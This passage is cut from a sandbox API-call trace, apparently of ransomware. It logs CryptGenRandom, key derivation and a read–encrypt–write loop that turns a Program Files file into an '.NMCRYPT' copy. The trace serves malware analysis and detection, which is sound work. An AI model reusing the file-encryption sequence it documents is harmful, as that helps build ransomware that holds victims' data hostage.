pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0169.471] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0169.472] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0169.472] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0169.472] CryptHashData (hHash=0x9ad278, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0169.473] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad478) returned 1 [0169.473] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0169.473] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0169.473] wcslen (_String="\\\\?\\") returned 0x4 [0169.473] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0169.473] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0169.473] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0169.473] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=9804) returned 1 [0169.474] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0169.474] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.492] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.492] GetLastError () returned 0x0 [0169.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.500] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.500] GetLastError () returned 0x0 [0169.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.500] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.500] GetLastError () returned 0x0 [0169.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.500] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.500] GetLastError () returned 0x0 [0169.500] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.500] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.501] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.501] GetLastError () returned 0x0 [0169.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.501] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.501] GetLastError () returned 0x0 [0169.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.501] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.501] GetLastError () returned 0x0 [0169.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.501] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.501] GetLastError () returned 0x0 [0169.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.501] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.501] GetLastError () returned 0x0 [0169.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.501] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.501] GetLastError () returned 0x0 [0169.501] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.501] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.502] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.502] GetLastError () returned 0x0 [0169.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.502] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.502] GetLastError () returned 0x0 [0169.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.502] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.502] GetLastError () returned 0x0 [0169.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.502] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.502] GetLastError () returned 0x0 [0169.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.502] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.502] GetLastError () returned 0x0 [0169.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.502] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.502] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.502] GetLastError () returned 0x0 [0169.502] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.503] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.526] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.526] GetLastError () returned 0x0 [0169.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.526] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.526] GetLastError () returned 0x0 [0169.526] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.526] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.526] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.526] GetLastError () returned 0x0 [0169.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.527] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.527] GetLastError () returned 0x0 [0169.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.527] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.527] GetLastError () returned 0x0 [0169.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.527] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.527] GetLastError () returned 0x0 [0169.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.527] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.527] GetLastError () returned 0x0 [0169.527] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.527] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.528] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0169.528] GetLastError () returned 0x0 [0169.528] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0169.528] ReadFile (in: hFile=0x15b0, lpBuffer=0x28828c0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28828c0*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0169.528] CryptEncrypt (in: hKey=0x9ad138, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 